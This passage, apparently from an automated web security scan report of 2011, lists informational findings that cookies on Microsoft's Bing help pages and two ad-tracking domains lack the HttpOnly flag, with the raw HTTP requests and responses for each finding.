P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:44 GMT
ntCoent-Length: 38647
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
See your search h
...[SNIP]...

14.89. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808490.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:43 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:42 GMT
ntCoent-Length: 32067
Content-Length: 32067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Get search sugges
...[SNIP]...

14.90. http://onlinehelp.microsoft.com/en-us/bing/ff808492.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808492.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808492.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; TocHashCookie=ff524484(n)/ff808551(n)/na/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:56 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:56 GMT
ntCoent-Length: 31031
Content-Length: 31031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Translate search
...[SNIP]...

14.91. http://onlinehelp.microsoft.com/en-us/bing/ff808506.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808506.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808506.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:51 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:51 GMT
ntCoent-Length: 33153
Content-Length: 33153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Explore the Bing
...[SNIP]...

14.92. http://onlinehelp.microsoft.com/en-us/bing/ff808522.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808522.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808522.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:48 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:47 GMT
ntCoent-Length: 39481
Content-Length: 39481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Find instant answ
...[SNIP]...

14.93. http://onlinehelp.microsoft.com/en-us/bing/ff919207.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff919207.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff919207.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:24 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:23 GMT
ntCoent-Length: 36344
Content-Length: 36344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Bing FAQ
</title>
...[SNIP]...

14.94. http://onlinehelp.microsoft.com/en-us/bing/gg276362.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/gg276362.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/gg276362.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; TocHashCookie=ff524484(n)/ff808551(n)/na/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:53 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:53 GMT
ntCoent-Length: 39329
Content-Length: 39329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Decide with the h
...[SNIP]...

14.95. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a; Domain=.brilig.com; Expires=Thu, 11-Jul-2041 20:49:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.96. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/C07583/b3/0/3/1008211/494237794.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4zOheXIMH/C1v6FY5Pio22rQpqLOQoPYd+GAD9VybyI+F4QNbwPPyvr8UGBZ6Vjnvedz63aa7pnxc5JCqQR+k2XOvNLfrCxC41VqqLiodbQjQZqBJei4H2TQvkinqMG8kBtM1kg38//fE0fhbl4QK/GL4tvC3vzfaUVMGHcMdGNMZDiIp4XW2dfAgHAn0AB43JJkmIRNHpWmlV7EGVMQOAUZTY3DQWOclImVvDGQzJdNDr9N803R6yNbqW2d3xDmBVK5G8Y5QNpT84suIacDxFRWhiYiXxb6RcnJUO2n/LXfOLncVWRHBhWNCNIPk4gU4G3WJWfrTzaR0w/9p8kAZYw/qSf0HduMZyRYt6LR1bdMVxUQzgDYC/ga7q1aqSAbYdYG+o469SYWL9OMk8vxEHcb637CHu1UrWG39L+tr8mGcL7imea6BA9t/9jx6c5vIunljkjwSkw7oZE6c9cxHJE3u6ZSqe5K7ULm42XLRCJg12GrcbV5R4Evkk8Eh3y8428t+dZDhkKZQfs6pQGSlwp/5wH0C/76A2MS1Et9/oXJ3c2aaIwXyMJ257RRIFcfpL1U2s4woUYUay7tTLmnBowyx/SmoO5VF7gHr3EqVITLWizD+JwSwrv3jkfgWAvJMCSFEmiAl6KPZbHNG37jgXCVku1jpFl4dQ8nZk9rn2v9l3cmZ2Ze33QfideBivuvdgt2Q0Ajm7NbHTt27ZRnHqp2Ze2QrczWEeEx7EO+FRH1TYLkFj7bxPfWgnX9H/Az/z5Qgw==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
rtc_dIjc=MLuv+wU1JqZm54q8Hc9tdX2JRlvw4fEEFjAEkGnErW3neGTXV6sAXywj2+TD0BEpKsotVcyDb3MMcWcoYQJpd2d4au6w0Xh8roW2nWZJXDYR9Kd8eCu6dQqQC8qahKfGbglVsA5+2UDXnLbOocJvkIJRGUX4PdBGmkkls8aGOJjqpAAImsR88MS+2NxYV1nd2bCt6JeEmWV43d5N5/27wYm8p9CKsDhDhO+aIBrMAD9Kc1T7uMUEHia5+S/jHp9eGWOXzUWuby5AmHyKl0sozhacqvg+hVT4fpsQBMQnUVKz06kvfaHm+b18ZfWcE5R1+4emRokkyg5Lz6sJh9MfIpH/tg/w2HHV2lzht3x7487+1ZnrUCF/k0LOrjKsJtnyHGTBbKMm8M/X/fhBqXDgo85X+d+JfhL66728UXfSGQy7MwHgC/u8qh5xrHTVEQlG/Vy9UQEtxEB5h95koMwxJYtAjMD5ez9eFMbwn8R8X6yAXd5ZfdhwCwO7KxHfK1D80MQMg3+O/19UFuGQHx7SYavwqwmOaWzc3pkf+a+mrl/g6/mJd8QoodbmlcanynR4JgCx9zoruuUZ2LTk6C21NttSdwV0wDYqLez5/4DEw8eJTwk8VvK4sBKhn2T0K2UkHqkzO7/tjDeMErx5ZEZDQ8Er1VLK/vL9SndjX59dWdDAOBkxQf4vFsm5KR2jzzEq508vyg/0YFWgKjruTimjz1KCP1EgulIovtwLKskAlsPZbvKFie23SVr97005AeaUTurR1HAPIrVSeDDeB7d5vTFUyiWF7ZQpefAVX1zXqG7yFRm3ovurajNuIe24/8YQwZKwjck9PISRB2XyEKW+Kd3ncQP2VCaf0eYHoQKHGOEV43Nxszk48KgpGCE1EuobtHFM+8ULkdSrtNL6yYUpU0e1hNKCY6+Ik4H25vPkx3rOpZtD1EkRlh3SFJZipPbf7QhObsuXhvcY6Ork0sMroCpov9Swx7uweG0k2maDgjDXYVHcAuiSS54mVJcM02MaS9YzQ0HARJzMQxRV7YfH8O+T5hSL7ThkiE+oTBLx3gZXkVU8x1Ir8zkTGPfbcM9KMd5ikUnq/5Nr48Imybb7xX0IMZh0HyqtEsQxQ30Q/BRPJXsJdSLioGeDfm8z4kAyGneEU7YNzetjulYI026F62PLG2CcUC6rUVPrYfPlZK1y6ZeALYBGYEpXE3SF46jsK63uQfoKghjjvN5DCVqy+dho8C6MgOtZlxOwD0iovPuYXIrQ9NBDrAPkKotTqcpOrgDYB4aVHR3OH1ng9LVm+QaEUZxEqjhHQGRDClWRKLdwYbBYbHNXp3xa76M58kMHfMS7u5d2rVioCiojHhgjyGmKL2K7cq1He3pRGRc4hgK393GnCqkU7pAe1HfDrgMpzxzGhn1+DuclYqMXebE18L86pd5rhEJdU0ozUxEVw5QQypjxoFdIvCOysCDpZ11RbwtNJv4WlQwGBEgpdn5N6k2sjAOwXiH+1T1U3OelCbQQLNm33D7sHXnwvljoqTHeLKK5pVbnCD9URanGGRP2vW2BKa3S0uR3MySw3DkglkprUlW4fBWWzjAKOpZUMoPcvL0QOQ/hekNVgA